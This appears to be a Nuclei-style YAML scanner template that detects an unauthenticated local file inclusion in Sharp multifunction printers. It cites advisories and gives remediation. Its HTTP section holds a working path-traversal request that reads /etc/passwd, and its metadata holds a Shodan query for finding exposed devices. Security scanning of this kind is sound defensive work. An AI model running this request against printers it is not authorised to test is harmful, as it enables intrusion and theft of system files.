41 lines
1.3 KiB
YAML
41 lines
1.3 KiB
YAML
id: sharp-printers-lfi
|
|
|
|
info:
|
|
name: Sharp Multifunction Printers - Local File Inclusion
|
|
author: gy741
|
|
severity: high
|
|
description: |
|
|
It was observed that Sharp printers are vulnerable to a local file inclusion without authentication. Any attacker can read any file located in the printer.
|
|
remediation: |
|
|
Apply all relevant security patches and product upgrades.
|
|
reference:
|
|
- https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-lfi
|
|
- https://jvn.jp/en/vu/JVNVU93051062/index.html
|
|
- https://global.sharp/products/copier/info/info_security_2024-05.html
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: "Set-Cookie: MFPSESSIONID="
|
|
tags: sharp,printer,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/installed_emanual_down.html?path=/manual/../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/octet-stream; name=passwd"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100878bae1080c18655ce87b467103626ced8e1c8913101dcd255d13bdbe6416ed702200ff98fbdf4ae214323dc5b259c6e40f09345f7bd46605528276bb867c228ed48:922c64590222798bb761d5b6d8e72950 |